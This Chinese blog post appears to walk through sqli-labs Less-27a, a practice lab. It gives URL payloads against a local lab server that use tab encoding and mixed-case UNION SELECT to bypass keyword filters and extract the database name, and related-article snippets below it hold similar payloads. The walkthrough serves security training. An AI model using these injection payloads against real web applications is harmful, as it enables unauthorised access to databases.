SQL注入分析-Less-27a

最新推荐文章于 2024-06-21 02:24:19 发布
最新推荐文章于 2024-06-21 02:24:19 发布
阅读量311 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33505576/article/details/113862522
版权

SQL注入分析-Less-27a

1、 概述:此关的名称GET-Blind Based-All your UNION & SELECT Belong to us-Double Quotes,中文名称是基于GET型的盲注—构造你自己的union和select—双引号注入,从题目名称来看,推测这关是盲注,无法通过报错信息来获取所需要的数据,要通过技巧绕过UNION和SELECT查询语句,而且拼接过程中需要使用双引号进行闭合。

2、根据猜想,按照提示输入:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=1

结果如下:

在这里插入图片描述
按照猜想,输入双引号试试:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=1"

在这里插入图片描述
这里没有正常回显,可能是对双引号敏感,对单引号不敏感,接下来输入单引号试试:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=1’

在这里插入图片描述
猜想基本成立。

3、 使用order by判断下表的列数:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=1"%09order%09by%091,2,3,"4

结果如下:

在这里插入图片描述
正常回显,继续:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=1"%09order%09by%091,2,3,4,"5

结果如下:

在这里插入图片描述
没有正常回显,列数为3,继续用union报回显位:

http://192.168.88.129/sqli-labs-master/Less-27a/?id=0"%09UnIon%09SeLect%091,2,"3

结果如下,成功在用户名和密码字段进行了回显。

在这里插入图片描述
将2换成database()试试报库名。

在这里插入图片描述
成功,下同。

复古追月
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1311
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
sql注入详细解释
JiangHu_Java的博客
10-21 430
sql注入以及应对措施sql注入是什么?sql注入的危害sql注入的几种方式 sql注入是什么? sql是我们操作数据库与其交互的语言,而sql注入是用户将Web页面的原URL、表单域或数据包输入的参数,修改拼接成sql语句,传递给Web服务器,进而传给数据库服务器。由于程序编写人员对于提交到数据库的请求没有进行验证和过滤导致拼接的sql语句被执行很有可能导致数据库的数据被获取,这就叫sql注入攻击。 上面说的 可能有一点复杂,其实sql注入简单来说就是将sql语句添加到输入的参数当中传递到数据库执行的一种
SQL注入分析-less-27
qq_33505576的博客
02-18 1553
SQL注入分析-less-27 **1、 概述:**从本篇开始,后续都会写个概述,简单描述一下对题目的理解,本关的题目是 GET-Error Based-All your UNION&SELECT Belong to us-String-Single quote 中文名称,基于GET型的报错-构造属于你自己的UNION和SELECT-单引号字符型的注入,从名字上来看,这关需要通过报错信息来获取库名、表名、列名和对应字段(列)的数据,同时应该是对单引号敏感。 2、 尝试一下我们的猜想,按照提示,输入参
sqli-labs ————less -27a(union、SELECT、绕过滤)
Fly_鹏程万里
05-16 681
Less-27a本关与第27关的去呗在于对于ID的处理,这里使用了“ ””,同时mysql的错误提示被屏蔽,所以报错注入无法进行。对于过滤的绕过技巧在上一节中已经讲过了,这里不再多说了。下面给出一个payload:http://192.168.11.136/sqli-labs/Less-27a?id=1"%a0UnIon%a0SElecT%a01,user(),"3读者有兴趣可以自己测试哈!...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli-labs第27a
最新发布
2401_84254343的博客
06-21 671
需要注意的是,关键字只过滤了union、UNION、Union,这三种形式,可以使用其他的大小写组合绕过。这一关是查询功能,地址栏输入id作为参数,后台根据id查询用户数据,并在前端页面显示出来。确定第一个字符的内容后,再按照此方法判断其余字符,为了提高效率,稍后使用脚本去枚举。参数中添加双引号,页面异常(空)显示,说明后台隐藏了报错信息,不适合报错注入。字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;输入不同的参数,页面会动态显示对应的用户数据,可以考虑联合注入。
建伍KENWOOD_TH-27A_TH-27E_TH_47A_TH47E英文说明书
10-04
在本资源摘要信息中,我们将对建伍KENWOOD公司的TH-27A、TH-27E、TH-47A和TH-47E系列产品的英文说明书进行详细的分析和解读。 一、产品概述 KENWOOD公司是一家日本知名的通信设备制造商,其产品涵盖了业余无线电、...
STC-GY-27A接线图1
08-04
【STC-GY-27A接线图1】是一个涉及微控制器应用的电路图,主要基于STC89C51单片机。STC89C51是一款8位微控制器,属于51系列,由...通过分析接线图,开发者可以理解各个部分如何协同工作,以便于系统的设计、调试和维护。
xswitch-pg123
01-16
5. `c1afd1155c8bd50608513b995ff398bca27a7f3ebf4d99b8f3a178a85b601b89`、`cb007f77bb47d01eb7ccda589970085933d24776d42e2db64e03d012b63f452d`等其他哈希命名文件同样可能包含代码、资源或配置信息。 6. `306a...
重症肌无力患者胸腺组织中microRNA-27a-3p的表达水平及其临床意义
02-26
重症肌无力患者胸腺组织中microRNA-27a-3p的表达水平及其临床意义,王丽华,李千,目的 探讨microRNA-27a-3p在重症肌无力(myasthenia gravis,MG)患者胸腺组织中的表达水平并分析其临床意义。 方法 收集2004年12月至...
Mir-27a靶向MSTN基因调节猪肌内脂肪含量的研究
02-09
Mir-27a靶向MSTN基因调节猪肌内脂肪含量的研究,虞德兵,,miRNA 是一类长度为21-25nt 的非编码RNA,通过与靶基因的3′UTR 区结合来调控基因表达,在调节生物体生长、发育、疾病发生过程等方面发�
sqli-labs/Less-27a
m0_71299382的博客
11-20 170
sqli-labs第二十七a关
sqli-labs:less-27a(过滤了union和select)
羽的博客
09-15 135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs/Less-27
m0_71299382的博客
11-20 386
sqli-labs第二十七关
Less-27and27a
老司机开代码的博客
08-04 258
文章目录1. 思路分析2. 注入过程3. 27a 1. 思路分析 这一关表上上告诉你他只是过滤了union和select,其实不然。 function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $
Sqli-labs之Less-27和Less-27a
m0_46315342的博客
06-04 292
                                          &nbs...
sql注入21-27关
qq_45751902的博客
04-01 3080
21关 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
Sqlilabs Less-27-28a Trick with SELECT & UNION
baynk的博客
04-02 391
Less-27 Trick with SELECT & UNION - Single Quote 手工注入 感觉和26没什么区别,一样的。。。 函数分析 preg_replace() 下面列出了当前可用的 PCRE 修饰符。括号中提到的名字是 PCRE 内部这些修饰符的名称。模式修饰符中的空格,换行符会被忽略,其他字符会导致错误。 i (PCRE_CASELESS) 如果设置了这个修...
SQL : 练习题-27题
weixin_44523387的博客
07-15 153
查询课程名称为「数学」,且分数低于 60 的学生姓名和分数 select student.sname, sc.score from student, sc, course where student.sid = sc.sid and course.cid = sc.cid and course.cname = "数学" and sc.score < 60; ...
Sqli-labs less 27a
weixin_33726313的博客
08-11 87
Less-27a 本关与27关的区别在于对于id的处理,这里用的是 " ,同时mysql的错误不会在前端页面显示。 我们根据27关直接给出一个示例payload: http://127.0.0.1/sqllib/Less-27a/?id=100"%a0UnIon%a0SElecT%a01,user(),"3 TIPs:这里说下以上payload我们利用最后的3前面的 " 将后面的 " 给闭...
sqli-labs27a
06-07
27A是Sqli-Labs中的一个具体任务,这个编号代表该挑战的难度等级,每个任务会逐渐递增,让你逐步理解和应对更复杂的SQL注入场景。 在Sqli-Labs27a中,你可能会遇到一个需要利用SQL注入技术来访问数据库、绕过权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值